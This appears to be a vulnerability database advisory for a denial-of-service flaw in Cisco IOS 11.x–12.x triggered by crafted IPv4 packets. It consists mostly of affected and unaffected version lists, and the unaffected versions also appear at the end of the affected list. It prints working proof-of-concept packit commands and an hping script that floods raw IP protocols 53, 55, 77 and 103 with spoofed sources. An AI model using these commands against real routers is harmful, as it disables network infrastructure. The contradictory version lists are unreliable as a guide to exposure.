Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.13 IA
Cisco IOS 11.1.13 CA
Cisco IOS 11.1.13 AA
Cisco IOS 11.1.13
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.20 .3
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 11.0.12
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco IOS 10.3.4 .3
Cisco IOS 10.3.4 .2
Cisco IOS 10.3.3 .4
Cisco IOS 10.3.3 .3
Cisco IOS 12.2ZJ
Cisco IOS 12.2ZJ
Cisco IOS 12.2ZH
Cisco IOS 12.2ZG
Cisco IOS 12.2ZF
Cisco IOS 12.2ZE
Cisco IOS 12.2ZE
Cisco IOS 12.2ZD
Cisco IOS 12.2ZC
Cisco IOS 12.2ZC
Cisco IOS 12.2ZB
Cisco IOS 12.2ZA
Cisco IOS 12.2ZA
Cisco IOS 12.2YZ
Cisco IOS 12.2YZ
Cisco IOS 12.2YY
Cisco IOS 12.2YY
Cisco IOS 12.2YX
Cisco IOS 12.2YX
Cisco IOS 12.2YW
Cisco IOS 12.2YW
Cisco IOS 12.2YV
Cisco IOS 12.2YU
Cisco IOS 12.2YU
Cisco IOS 12.2YT
Cisco IOS 12.2YS
Cisco IOS 12.2YR
Cisco IOS 12.2YR
Cisco IOS 12.2YQ
Cisco IOS 12.2YP
Cisco IOS 12.2YP
Cisco IOS 12.2YO
Cisco IOS 12.2YN
Cisco IOS 12.2YM
Cisco IOS 12.2YL
Cisco IOS 12.2YL
Cisco IOS 12.2YK
Cisco IOS 12.2YK
Cisco IOS 12.2YJ
Cisco IOS 12.2YH
Cisco IOS 12.2YG
Cisco IOS 12.2YF
Cisco IOS 12.2YD
Cisco IOS 12.2YC
Cisco IOS 12.2YB
Cisco IOS 12.2YA
Cisco IOS 12.2XW
Cisco IOS 12.2XT
Cisco IOS 12.2XS
Cisco IOS 12.2XR
Cisco IOS 12.2XQ
Cisco IOS 12.2XQ
Cisco IOS 12.2XN
Cisco IOS 12.2XM
Cisco IOS 12.2XL
Cisco IOS 12.2XK
Cisco IOS 12.2XK
Cisco IOS 12.2XK
Cisco IOS 12.2XJ
Cisco IOS 12.2XJ
Cisco IOS 12.2XI
Cisco IOS 12.2XH
Cisco IOS 12.2XG
Cisco IOS 12.2XF
Cisco IOS 12.2XE
Cisco IOS 12.2XD
Cisco IOS 12.2XC
Cisco IOS 12.2XB
Cisco IOS 12.2XA
Cisco IOS 12.2T
Cisco IOS 12.2SZ
Cisco IOS 12.2SY
Cisco IOS 12.2SY
Cisco IOS 12.2SX
Cisco IOS 12.2S
Cisco IOS 12.2PI
Cisco IOS 12.2PB
Cisco IOS 12.2MX
Cisco IOS 12.2MX
Cisco IOS 12.2MC
Cisco IOS 12.2MB
Cisco IOS 12.2JA
Cisco IOS 12.2DX
Cisco IOS 12.2DD
Cisco IOS 12.2DA
Cisco IOS 12.2CY
Cisco IOS 12.2CY
Cisco IOS 12.2CX
Cisco IOS 12.2CX
Cisco IOS 12.2BZ
Cisco IOS 12.2BY
Cisco IOS 12.2BX
Cisco IOS 12.2BW
Cisco IOS 12.2BW
Cisco IOS 12.2BC
Cisco IOS 12.2B
Cisco IOS 12.2(9)S
Cisco IOS 12.2(8)T
Cisco IOS 12.2(8)BC1
Cisco IOS 12.2(7a)
Cisco IOS 12.2(7.4)S
Cisco IOS 12.2(7)DA
Cisco IOS 12.2(7)
Cisco IOS 12.2(6c)
Cisco IOS 12.2(6.8)T1a
Cisco IOS 12.2(6.8)T0a
Cisco IOS 12.2(5d)
Cisco IOS 12.2(5)CA1
Cisco IOS 12.2(5)
Cisco IOS 12.2(4)YB
Cisco IOS 12.2(4)YA1
Cisco IOS 12.2(4)YA
Cisco IOS 12.2(4)XW1
Cisco IOS 12.2(4)XW
Cisco IOS 12.2(4)XM2
Cisco IOS 12.2(4)XM
Cisco IOS 12.2(4)XL4
Cisco IOS 12.2(4)XL
Cisco IOS 12.2(4)T3
Cisco IOS 12.2(4)T
Cisco IOS 12.2(4)MX1
Cisco IOS 12.2(4)MX
Cisco IOS 12.2(4)MB3
Cisco IOS 12.2(4)BX
Cisco IOS 12.2(4)BX
Cisco IOS 12.2(4)BC1a
Cisco IOS 12.2(4)BC1
Cisco IOS 12.2(4)B4
Cisco IOS 12.2(4)B3
Cisco IOS 12.2(4)B2
Cisco IOS 12.2(4)B1
Cisco IOS 12.2(4)B
Cisco IOS 12.2(4)
Cisco IOS 12.2(3d)
Cisco IOS 12.2(3.4)BP
Cisco IOS 12.2(3)
Cisco IOS 12.2(2.2)T
Cisco IOS 12.2(2)YC
Cisco IOS 12.2(2)XU2
Cisco IOS 12.2(2)XU
Cisco IOS 12.2(2)XT3
Cisco IOS 12.2(2)XT
Cisco IOS 12.2(2)XN
Cisco IOS 12.2(2)XK2
Cisco IOS 12.2(2)XK
Cisco IOS 12.2(2)XJ1
Cisco IOS 12.2(2)XJ
Cisco IOS 12.2(2)XI2
Cisco IOS 12.2(2)XI1
Cisco IOS 12.2(2)XI
Cisco IOS 12.2(2)XH3
Cisco IOS 12.2(2)XH2
Cisco IOS 12.2(2)XH
Cisco IOS 12.2(2)XG
Cisco IOS 12.2(2)XF
Cisco IOS 12.2(2)XB4
Cisco IOS 12.2(2)XB3
Cisco IOS 12.2(2)XB
Cisco IOS 12.2(2)XA5
Cisco IOS 12.2(2)XA1
Cisco IOS 12.2(2)XA
Cisco IOS 12.2(2)T4
Cisco IOS 12.2(2)DD3
Cisco IOS 12.2(2)BY2
Cisco IOS 12.2(2)BY
Cisco IOS 12.2(2)BY
Cisco IOS 12.2(2)BX
Cisco IOS 12.2(2)B
Cisco IOS 12.2(1d)
Cisco IOS 12.2(1b)DA1
Cisco IOS 12.2(1b)
Cisco IOS 12.2(13.03)B
Cisco IOS 12.2(13)T1
Cisco IOS 12.2(12.05)T
Cisco IOS 12.2(12.05)S
Cisco IOS 12.2(12.05)
Cisco IOS 12.2(12.02)T
Cisco IOS 12.2(12.02)S
Cisco IOS 12.2(11)T3
Cisco IOS 12.2(11)T
Cisco IOS 12.2(1.4)S
Cisco IOS 12.2(1.1)PI
Cisco IOS 12.2(1.1)
Cisco IOS 12.2(1)XS1
Cisco IOS 12.2(1)XS
Cisco IOS 12.2(1)XQ
Cisco IOS 12.2(1)XH
Cisco IOS 12.2(1)XE3
Cisco IOS 12.2(1)XE2
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XE
Cisco IOS 12.2(1)XD4
Cisco IOS 12.2(1)XD3
Cisco IOS 12.2(1)XD1
Cisco IOS 12.2(1)XD1
Cisco IOS 12.2(1)XD
Cisco IOS 12.2(1)XA
Cisco IOS 12.2(1)DX
Cisco IOS 12.2(1)
Cisco IOS 12.2
Cisco IOS 12.1YJ
Cisco IOS 12.1YI
Cisco IOS 12.1YH
Cisco IOS 12.1YF
Cisco IOS 12.1YE
Cisco IOS 12.1YD
Cisco IOS 12.1YC
Cisco IOS 12.1YB
Cisco IOS 12.1YA
Cisco IOS 12.1XZ
Cisco IOS 12.1XY
Cisco IOS 12.1XX
Cisco IOS 12.1XW
Cisco IOS 12.1XV
Cisco IOS 12.1XU
Cisco IOS 12.1XT
Cisco IOS 12.1XS
Cisco IOS 12.1XR
Cisco IOS 12.1XQ
Cisco IOS 12.1XP
Cisco IOS 12.1XM
Cisco IOS 12.1XL
Cisco IOS 12.1XK
Cisco IOS 12.1XJ
Cisco IOS 12.1XI
Cisco IOS 12.1XH
Cisco IOS 12.1XG
Cisco IOS 12.1XF
Cisco IOS 12.1XE
Cisco IOS 12.1XD
Cisco IOS 12.1XC
Cisco IOS 12.1XB
Cisco IOS 12.1XA
Cisco IOS 12.1T
Cisco IOS 12.1T
Cisco IOS 12.1M
Cisco IOS 12.1EZ
Cisco IOS 12.1EY
Cisco IOS 12.1EX
Cisco IOS 12.1EW
Cisco IOS 12.1EV
Cisco IOS 12.1EC
Cisco IOS 12.1EB
Cisco IOS 12.1EA
Cisco IOS 12.1E
Cisco IOS 12.1DC
Cisco IOS 12.1DB
Cisco IOS 12.1DA
Cisco IOS 12.1CX
Cisco IOS 12.1AY
Cisco IOS 12.1AX
Cisco IOS 12.1AX
Cisco IOS 12.1AA
Cisco IOS 12.10S
Cisco IOS 12.1(9a)
Cisco IOS 12.1(9)EX3
Cisco IOS 12.1(9)EX
Cisco IOS 12.1(9)E3
Cisco IOS 12.1(9)E
Cisco IOS 12.1(9)AA
Cisco IOS 12.1(9)
Cisco IOS 12.1(8c)
Cisco IOS 12.1(8b)EX4
Cisco IOS 12.1(8b)E9
Cisco IOS 12.1(8b)E8
Cisco IOS 12.1(8a)EX
Cisco IOS 12.1(8a)EW1
Cisco IOS 12.1(8a)EW
Cisco IOS 12.1(8a)E
Cisco IOS 12.1(8)EA2b
Cisco IOS 12.1(8)EA1b
Cisco IOS 12.1(8)E
Cisco IOS 12.1(8)AA1
Cisco IOS 12.1(8)
Cisco IOS 12.1(7b)
Cisco IOS 12.1(7a)EY3
Cisco IOS 12.1(7a)EY
Cisco IOS 12.1(7a)E6
Cisco IOS 12.1(7)EC
Cisco IOS 12.1(7)DA3
Cisco IOS 12.1(7)DA2
Cisco IOS 12.1(7)CX
Cisco IOS 12.1(7)
Cisco IOS 12.1(6a)
Cisco IOS 12.1(6.5)EC3
Cisco IOS 12.1(6)EZ2
Cisco IOS 12.1(6)EZ1
Cisco IOS 12.1(6)EY
Cisco IOS 12.1(6)EA2c
Cisco IOS 12.1(6)EA2b
Cisco IOS 12.1(6)EA2a
Cisco IOS 12.1(6)EA2
Cisco IOS 12.1(6)EA1a
Cisco IOS 12.1(6)EA1
Cisco IOS 12.1(6)E8
Cisco IOS 12.1(5e)
Cisco IOS 12.1(5c)EX
Cisco IOS 12.1(5c)E12
Cisco IOS 12.1(5)YI1
Cisco IOS 12.1(5)YI
Cisco IOS 12.1(5)YH3
Cisco IOS 12.1(5)YH
Cisco IOS 12.1(5)YF4
Cisco IOS 12.1(5)YF2
Cisco IOS 12.1(5)YF
Cisco IOS 12.1(5)YD6
Cisco IOS 12.1(5)YD2
Cisco IOS 12.1(5)YD
Cisco IOS 12.1(5)YC2
Cisco IOS 12.1(5)YC1
Cisco IOS 12.1(5)YC
Cisco IOS 12.1(5)YB5
Cisco IOS 12.1(5)YB4
Cisco IOS 12.1(5)YB
Cisco IOS 12.1(5)YA2
Cisco IOS 12.1(5)YA
Cisco IOS 12.1(5)XY6
Cisco IOS 12.1(5)XV5
Cisco IOS 12.1(5)XV4
Cisco IOS 12.1(5)XV3
Cisco IOS 12.1(5)XV
Cisco IOS 12.1(5)XU1
Cisco IOS 12.1(5)XS2
Cisco IOS 12.1(5)XS
Cisco IOS 12.1(5)XR2
Cisco IOS 12.1(5)XM7
Cisco IOS 12.1(5)XM4
Cisco IOS 12.1(5)XM
Cisco IOS 12.1(5)XG5
Cisco IOS 12.1(5)T9
Cisco IOS 12.1(5)T12
Cisco IOS 12.1(5)T
Cisco IOS 12.1(5)EY
Cisco IOS 12.1(5)DC2
Cisco IOS 12.1(5)DC
Cisco IOS 12.1(5)DB1
Cisco IOS 12.1(5)DA1
Cisco IOS 12.1(4a)
Cisco IOS 12.1(4.3)T
Cisco IOS 12.1(4)XZ7
Cisco IOS 12.1(4)XZ
Cisco IOS 12.1(4)XM4
Cisco IOS 12.1(4)EA1e
Cisco IOS 12.1(4)E3
Cisco IOS 12.1(4)DC2
Cisco IOS 12.1(4)DC
Cisco IOS 12.1(4)DB2
Cisco IOS 12.1(4)DB1
Cisco IOS 12.1(4)DB
Cisco IOS 12.1(4)
Cisco IOS 12.1(3b)
Cisco IOS 12.1(3a)XI8
Cisco IOS 12.1(3a)E8
Cisco IOS 12.1(3a)E7
Cisco IOS 12.1(3)XT3
Cisco IOS 12.1(3)XT
Cisco IOS 12.1(3)XQ
Cisco IOS 12.1(3)XP4
Cisco IOS 12.1(3)XP
Cisco IOS 12.1(3)XI
Cisco IOS 12.1(3)DC2
Cisco IOS 12.1(3)DB1
Cisco IOS 12.1(2b)
Cisco IOS 12.1(2)XF5
Cisco IOS 12.1(2)XF4
Cisco IOS 12.1(2)XF
Cisco IOS 12.1(2)E1
Cisco IOS 12.1(1c)
Cisco IOS 12.1(1a)T1
Cisco IOS 12.1(13.4)E
Cisco IOS 12.1(13)
Cisco IOS 12.1(12c)EC
Cisco IOS 12.1(12b)
Cisco IOS 12.1(12)E
Cisco IOS 12.1(11b)E
Cisco IOS 12.1(11b)
Cisco IOS 12.1(11)EC
Cisco IOS 12.1(11)EA1
Cisco IOS 12.1(11)E
Cisco IOS 12.1(11)
Cisco IOS 12.1(10a)
Cisco IOS 12.1(10)EY
Cisco IOS 12.1(10)EX
Cisco IOS 12.1(10)EC1
Cisco IOS 12.1(10)E4
Cisco IOS 12.1(10)E
Cisco IOS 12.1(10)AA
Cisco IOS 12.1(1.3)T
Cisco IOS 12.1(1)T
Cisco IOS 12.1(1)EX
Cisco IOS 12.1(1)E5
Cisco IOS 12.1(1)DC2
Cisco IOS 12.1(1)DC
Cisco IOS 12.1(1)DB2
Cisco IOS 12.1(1)DB
Cisco IOS 12.1(1)
Cisco IOS 12.1
Cisco IOS 12.0XW
Cisco IOS 12.0XV
Cisco IOS 12.0XU
Cisco IOS 12.0XS
Cisco IOS 12.0XR
Cisco IOS 12.0XQ
Cisco IOS 12.0XP
Cisco IOS 12.0XN
Cisco IOS 12.0XM
Cisco IOS 12.0XL
Cisco IOS 12.0XK
Cisco IOS 12.0XJ
Cisco IOS 12.0XI
Cisco IOS 12.0XH
Cisco IOS 12.0XG
Cisco IOS 12.0XF
Cisco IOS 12.0XE
Cisco IOS 12.0XD
Cisco IOS 12.0XC
Cisco IOS 12.0XB
Cisco IOS 12.0XA
Cisco IOS 12.0WX
Cisco IOS 12.0WT
Cisco IOS 12.0WC
Cisco IOS 12.0WC
Cisco IOS 12.0WC
Cisco IOS 12.0W5
Cisco IOS 12.0T
Cisco IOS 12.0SZ
Cisco IOS 12.0SY
Cisco IOS 12.0SX
Cisco IOS 12.0ST
Cisco IOS 12.0SP
Cisco IOS 12.0SL
Cisco IOS 12.0SC
Cisco IOS 12.0S
Cisco IOS 12.0DC
Cisco IOS 12.0DB
Cisco IOS 12.0DA
Cisco IOS 12.0(9a)
Cisco IOS 12.0(9)S8
Cisco IOS 12.0(9)S
Cisco IOS 12.0(9)
Cisco IOS 12.0(8a)
Cisco IOS 12.0(8.3)SC
Cisco IOS 12.0(8.0.2)S
Cisco IOS 12.0(8)S1
Cisco IOS 12.0(8)S1
Cisco IOS 12.0(8)
Cisco IOS 12.0(7a)
Cisco IOS 12.0(7.4)S
Cisco IOS 12.0(7)XV
Cisco IOS 12.0(7)XK3
Cisco IOS 12.0(7)XK
Cisco IOS 12.0(7)XF1
Cisco IOS 12.0(7)XF
Cisco IOS 12.0(7)XE2
Cisco IOS 12.0(7)XE
Cisco IOS 12.0(7)WX5(15a)
Cisco IOS 12.0(7)T2
Cisco IOS 12.0(7)T
Cisco IOS 12.0(7)SC
Cisco IOS 12.0(7)S1
Cisco IOS 12.0(7)DC1
Cisco IOS 12.0(7)DB2
Cisco IOS 12.0(6b)
Cisco IOS 12.0(5.4)WC1
Cisco IOS 12.0(5.3)WC1
Cisco IOS 12.0(5.2)XU
Cisco IOS 12.0(5.1)XP
Cisco IOS 12.0(5)YB4
Cisco IOS 12.0(5)XU
Cisco IOS 12.0(5)XS?
Cisco IOS 12.0(5)XS
Cisco IOS 12.0(5)XN1
Cisco IOS 12.0(5)XN
Cisco IOS 12.0(5)XK2
Cisco IOS 12.0(5)XK
Cisco IOS 12.0(5)XK
Cisco IOS 12.0(5)XE?
Cisco IOS 12.0(5)XE
Cisco IOS 12.0(5)XE
Cisco IOS 12.0(5)XE
Cisco IOS 12.0(5)WX
Cisco IOS 12.0(5)WC3b
Cisco IOS 12.0(5)WC3
Cisco IOS 12.0(5)WC3
Cisco IOS 12.0(5)WC2b
Cisco IOS 12.0(5)WC2b
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(5)WC2
Cisco IOS 12.0(5)WC 2900XL-LRE
Cisco IOS 12.0(5)T1
Cisco IOS 12.0(5)T
Cisco IOS 12.0(4)XM1
Cisco IOS 12.0(4)XM
Cisco IOS 12.0(4)XE1
Cisco IOS 12.0(4)XE
Cisco IOS 12.0(3d)
Cisco IOS 12.0(3)XE
Cisco IOS 12.0(3)
Cisco IOS 12.0(2b)
Cisco IOS 12.0(21a)
Cisco IOS 12.0(21)SX
Cisco IOS 12.0(21)ST
Cisco IOS 12.0(21)S3
Cisco IOS 12.0(21)S1
Cisco IOS 12.0(21)S
Cisco IOS 12.0(20a)
Cisco IOS 12.0(20.4)SP
Cisco IOS 12.0(20)W5(22b)
Cisco IOS 12.0(20)W5(22b)
Cisco IOS 12.0(20)SX
Cisco IOS 12.0(20)ST2
Cisco IOS 12.0(20)SP1
Cisco IOS 12.0(2)XE?
Cisco IOS 12.0(2)XE
Cisco IOS 12.0(19a)
Cisco IOS 12.0(19)ST2
Cisco IOS 12.0(19)ST
Cisco IOS 12.0(19)SL4
Cisco IOS 12.0(19)S2
Cisco IOS 12.0(19)S
Cisco IOS 12.0(18b)
Cisco IOS 12.0(18)W5(22b)
Cisco IOS 12.0(18)W5(22b)
Cisco IOS 12.0(18)ST1
Cisco IOS 12.0(18)S5
Cisco IOS 12.0(18)S
Cisco IOS 12.0(17a)
Cisco IOS 12.0(17)ST5
Cisco IOS 12.0(17)ST1
Cisco IOS 12.0(17)SL6
Cisco IOS 12.0(17)SL2
Cisco IOS 12.0(17)S4
Cisco IOS 12.0(17)S
Cisco IOS 12.0(17)
Cisco IOS 12.0(16a)
Cisco IOS 12.0(16.06)S
Cisco IOS 12.0(16)W5(21)
Cisco IOS 12.0(16)ST1
Cisco IOS 12.0(16)SC3
Cisco IOS 12.0(16)S8
Cisco IOS 12.0(15a)
Cisco IOS 12.0(15)S6
Cisco IOS 12.0(15)S3
Cisco IOS 12.0(14a)
Cisco IOS 12.0(14)W5(20)
Cisco IOS 12.0(14)ST3
Cisco IOS 12.0(14)ST
Cisco IOS 12.0(14)S7
Cisco IOS 12.0(13a)
Cisco IOS 12.0(13)WT6(1)
Cisco IOS 12.0(13)W5(19c)
Cisco IOS 12.0(13)S6
Cisco IOS 12.0(12a)
Cisco IOS 12.0(12)S3
Cisco IOS 12.0(12)S3
Cisco IOS 12.0(11a)
Cisco IOS 12.0(11)ST4
Cisco IOS 12.0(11)S6
Cisco IOS 12.0(10a)
Cisco IOS 12.0(10)W5(18g)
Cisco IOS 12.0(10)W5(18f)
Cisco IOS 12.0(10)W5
Cisco IOS 12.0(10)S7
Cisco IOS 12.0(1)ST
Cisco IOS 12.0(1)S
Cisco IOS 12.0(1)S
Cisco IOS 12.0
Cisco IOS 11.3XA
Cisco IOS 11.3WA4
Cisco IOS 11.3T
Cisco IOS 11.3NA
Cisco IOS 11.3MA
Cisco IOS 11.3HA
Cisco IOS 11.3DB
Cisco IOS 11.3DA
Cisco IOS 11.3AA
Cisco IOS 11.3(8)DB2
Cisco IOS 11.3(7)DB1
Cisco IOS 11.3(2)XA
Cisco IOS 11.3(11c)
Cisco IOS 11.3(11b)T2
Cisco IOS 11.3(11b)
Cisco IOS 11.3
Cisco IOS 11.2XA
Cisco IOS 11.2WA4
Cisco IOS 11.2WA3
Cisco IOS 11.2SA
Cisco IOS 11.2P
Cisco IOS 11.2GS
Cisco IOS 11.2F
Cisco IOS 11.2BC
Cisco IOS 11.2(9)XA
Cisco IOS 11.2(8.9)SA6
Cisco IOS 11.2(4)XAf
Cisco IOS 11.2(4)XA
Cisco IOS 11.2(4)
Cisco IOS 11.2(26b)
Cisco IOS 11.2(26a)
Cisco IOS 11.2(26)P2
Cisco IOS 11.2(26)P2
Cisco IOS 11.2(23a)BC1
Cisco IOS 11.2(19a)GS6
Cisco IOS 11.2(19)GS0.2
Cisco IOS 11.2(17)
Cisco IOS 11.2(11b)T2
Cisco IOS 11.2
Cisco IOS 11.1IA
Cisco IOS 11.1CT
Cisco IOS 11.1CC
Cisco IOS 11.1CA
Cisco IOS 11.1AA
Cisco IOS 11.1(36)CC4
Cisco IOS 11.1(36)CC2
Cisco IOS 11.1(36)CA2
Cisco IOS 11.1(28a)IA
Cisco IOS 11.1(28a)CT
Cisco IOS 11.1(24b)
Cisco IOS 11.1(24a)
Cisco IOS 11.1(20)AA4
Cisco IOS 11.1
Cisco IOS 11.0(22b)
Cisco IOS 11.0(22a)
Cisco IOS 11.0(18)
Cisco IOS 11.0
Cisco IOS 11.0
Cisco IOS 10.3
Cisco ONS 15454 Optical Transport Platform 4.1
Cisco IOS 12.3(1a)
Cisco IOS 12.3
Cisco IOS 12.2ZL
Cisco IOS 12.2ZJ
Cisco IOS 12.2ZH
Cisco IOS 12.2ZG
Cisco IOS 12.2ZF
Cisco IOS 12.2T
Cisco IOS 12.2DA
Cisco IOS 12.2(8)ZB7
Cisco IOS 12.2(8)YY3
Cisco IOS 12.2(8)YY
Cisco IOS 12.2(8)YW2
Cisco IOS 12.2(8)YD
Cisco IOS 12.2(8)T10
Cisco IOS 12.2(4)T6
Cisco IOS 12.2(4)MB12
Cisco IOS 12.2(2)YC
Cisco IOS 12.2(2)XB11
Cisco IOS 12.2(17)
Cisco IOS 12.2(17)
Cisco IOS 12.2(16.5)S
Cisco IOS 12.2(16)BX
Cisco IOS 12.2(16)B1
Cisco IOS 12.2(15)ZL
Cisco IOS 12.2(15)ZJ1
Cisco IOS 12.2(15)YS/1.2(1)
Cisco IOS 12.2(15)T5
Cisco IOS 12.2(15)BC1
Cisco IOS 12.2(14)ZA2
Cisco IOS 12.2(14)SZ2
Cisco IOS 12.2(14)SY1
Cisco IOS 12.2(14)SX1
Cisco IOS 12.2(13)ZH
Cisco IOS 12.2(13)ZC
Cisco IOS 12.2(13)MC1
Cisco IOS 12.2(12)DA3
Cisco IOS 12.2(11)YZ2
Cisco IOS 12.2(11)YX1
Cisco IOS 12.2(11)YP1
Cisco IOS 12.2(11)T9
Cisco IOS 12.2(11)JA
Cisco IOS 12.2(11)BC3c
Cisco IOS 12.2(10)DA2
Cisco IOS 12.2
Cisco IOS 12.1(8b)E14
Cisco IOS 12.1(6)E12
Cisco IOS 12.1(5)T15
Cisco IOS 12.1(20)
Cisco IOS 12.1(19)EW
Cisco IOS 12.1(19)EC
Cisco IOS 12.1(19)E
Cisco IOS 12.1(18.4)
Cisco IOS 12.1(15)BC1
Cisco IOS 12.1(14)EB
Cisco IOS 12.1(14)EA1
Cisco IOS 12.1(14)E4
Cisco IOS 12.1(14)E4
Cisco IOS 12.1(13)EX2
Cisco IOS 12.1(13)EW
Cisco IOS 12.1(13)EA1c
Cisco IOS 12.1(13)E7
Cisco IOS 12.1(13)AY
Cisco IOS 12.1(12c)EV01
Cisco IOS 12.1(12c)E7
Cisco IOS 12.1(11b)E12
Cisco IOS 12.1
Cisco IOS 12.1
Cisco IOS 12.0T
Cisco IOS 12.0(7)T3
Cisco IOS 12.0(26)W5(28a)
Cisco IOS 12.0(26)W5(28)
Cisco IOS 12.0(26)
Cisco IOS 12.0(25)W5(27)
Cisco IOS 12.0(25)S1
Cisco IOS 12.0(24)S2
Cisco IOS 12.0(23)S3
Cisco IOS 12.0(22)S5
Cisco IOS 12.0(21)ST7
Cisco IOS 12.0(21)S7
Cisco IOS 12.0(21)S5a
Cisco IOS 12.0(21)S4a
Cisco IOS 12.0(20)ST6
Cisco IOS 12.0(19)ST6
Cisco IOS 12.0(19)S4
Cisco IOS 12.0(19)S2a
Cisco IOS 12.0(18)S7
Cisco IOS 12.0(18)S5a
Cisco IOS 12.0(17)ST8
Cisco IOS 12.0(17)SL9
Cisco IOS 12.0(17)S7
Cisco IOS 12.0(16)S8a
Cisco IOS 12.0(16)S10
Cisco IOS 12.0(15)S7
Cisco IOS 12.0(14)S8
Cisco IOS 12.0(13)S8
Cisco IOS 12.0(12)S4
Cisco IOS 12.0(10)S8
Cisco IOS 12.0(10)S3b
Cisco IOS 12.0(05)WC9
Cisco IOS 11.3(11d)
Cisco IOS 11.2(26e)
Cisco IOS 11.2(26)P5
Cisco IOS 11.2(15b)
Cisco IOS 11.1(36)CA4
Cisco IOS 11.1(24c)

- 不受影响的程序版本

Cisco ONS 15454 Optical Transport Platform 4.1
Cisco IOS 12.3(1a)
Cisco IOS 12.3
Cisco IOS 12.2ZL
Cisco IOS 12.2ZJ
Cisco IOS 12.2ZH
Cisco IOS 12.2ZG
Cisco IOS 12.2ZF
Cisco IOS 12.2T
Cisco IOS 12.2DA
Cisco IOS 12.2(8)ZB7
Cisco IOS 12.2(8)YY3
Cisco IOS 12.2(8)YY
Cisco IOS 12.2(8)YW2
Cisco IOS 12.2(8)YD
Cisco IOS 12.2(8)T10
Cisco IOS 12.2(4)T6
Cisco IOS 12.2(4)MB12
Cisco IOS 12.2(2)YC
Cisco IOS 12.2(2)XB11
Cisco IOS 12.2(17)
Cisco IOS 12.2(17)
Cisco IOS 12.2(16.5)S
Cisco IOS 12.2(16)BX
Cisco IOS 12.2(16)B1
Cisco IOS 12.2(15)ZL
Cisco IOS 12.2(15)ZJ1
Cisco IOS 12.2(15)YS/1.2(1)
Cisco IOS 12.2(15)T5
Cisco IOS 12.2(15)BC1
Cisco IOS 12.2(14)ZA2
Cisco IOS 12.2(14)SZ2
Cisco IOS 12.2(14)SY1
Cisco IOS 12.2(14)SX1
Cisco IOS 12.2(13)ZH
Cisco IOS 12.2(13)ZC
Cisco IOS 12.2(13)MC1
Cisco IOS 12.2(12)DA3
Cisco IOS 12.2(11)YZ2
Cisco IOS 12.2(11)YX1
Cisco IOS 12.2(11)YP1
Cisco IOS 12.2(11)T9
Cisco IOS 12.2(11)JA
Cisco IOS 12.2(11)BC3c
Cisco IOS 12.2(10)DA2
Cisco IOS 12.2
Cisco IOS 12.1(8b)E14
Cisco IOS 12.1(6)E12
Cisco IOS 12.1(5)T15
Cisco IOS 12.1(20)
Cisco IOS 12.1(19)EW
Cisco IOS 12.1(19)EC
Cisco IOS 12.1(19)E
Cisco IOS 12.1(18.4)
Cisco IOS 12.1(15)BC1
Cisco IOS 12.1(14)EB
Cisco IOS 12.1(14)EA1
Cisco IOS 12.1(14)E4
Cisco IOS 12.1(14)E4
Cisco IOS 12.1(13)EX2
Cisco IOS 12.1(13)EW
Cisco IOS 12.1(13)EA1c
Cisco IOS 12.1(13)E7
Cisco IOS 12.1(13)AY
Cisco IOS 12.1(12c)EV01
Cisco IOS 12.1(12c)E7
Cisco IOS 12.1(11b)E12
Cisco IOS 12.1
Cisco IOS 12.1
Cisco IOS 12.0T
Cisco IOS 12.0(7)T3
Cisco IOS 12.0(26)W5(28a)
Cisco IOS 12.0(26)W5(28)
Cisco IOS 12.0(26)
Cisco IOS 12.0(25)W5(27)
Cisco IOS 12.0(25)S1
Cisco IOS 12.0(24)S2
Cisco IOS 12.0(23)S3
Cisco IOS 12.0(22)S5
Cisco IOS 12.0(21)ST7
Cisco IOS 12.0(21)S7
Cisco IOS 12.0(21)S5a
Cisco IOS 12.0(21)S4a
Cisco IOS 12.0(20)ST6
Cisco IOS 12.0(19)ST6
Cisco IOS 12.0(19)S4
Cisco IOS 12.0(19)S2a
Cisco IOS 12.0(18)S7
Cisco IOS 12.0(18)S5a
Cisco IOS 12.0(17)ST8
Cisco IOS 12.0(17)SL9
Cisco IOS 12.0(17)S7
Cisco IOS 12.0(16)S8a
Cisco IOS 12.0(16)S10
Cisco IOS 12.0(15)S7
Cisco IOS 12.0(14)S8
Cisco IOS 12.0(13)S8
Cisco IOS 12.0(12)S4
Cisco IOS 12.0(10)S8
Cisco IOS 12.0(10)S3b
Cisco IOS 12.0(05)WC9
Cisco IOS 11.3(11d)
Cisco IOS 11.2(26e)
Cisco IOS 11.2(26)P5
Cisco IOS 11.2(15b)
Cisco IOS 11.1(36)CA4
Cisco IOS 11.1(24c)

- 漏洞讨论

A denial of service vulnerability has been reported to exist in all hardware platforms that run Cisco IOS versions 11.x through 12.x. This issue may be triggered by a sequence of specifically crafted IPV4 packets. A power cycling of an affected device is required to regain normal functionality.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

This issue can be exploited with utilities such as hping, so specific exploit code is not required to exploit this issue.

The following proof-of-concept has been provided to reproduce the vulnerability using packit 0.6.0d and later:
packit -t RAWIP -V 53 -d dst_ip -T ttl
packit -t RAWIP -V 55 -d dst_ip -T ttl
packit -t RAWIP -V 77 -d dst_ip -T ttl
packit -t RAWIP -V 103 -d dst_ip -T ttl

The following shell script has been made available by Pat Donahue:

---
#!/bin/tcsh -f

if ($1 == "" || $2 == "") then
echo "usage: $0 &lt;router hostname|address&gt; &lt;ttl&gt;"
exit
endif

foreach protocol (53 55 77 103)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto
$protocol --count 19 --interval u250 --data 26
end
---

Additional exploits have been made available by Michal Zalewski and Martin Kluge.

The following exploit is available:

- 解决方案

Further information regarding obtaining and applying fixes and workarounds can be found in the attached Cisco security advisory (cisco-sa-20030717). Some releases may not be available at this time, so users should also consult the advisory for further details regarding the availability of fixed releases.

The Symantec DeepSight Threat Management System has witnessed that this vulnerability is currently being exploited in the wild and considers it a high risk. Patches should be applied immediately and in situations where this is not possible, administrators are advised to evaluate the applicability of all available workarounds.

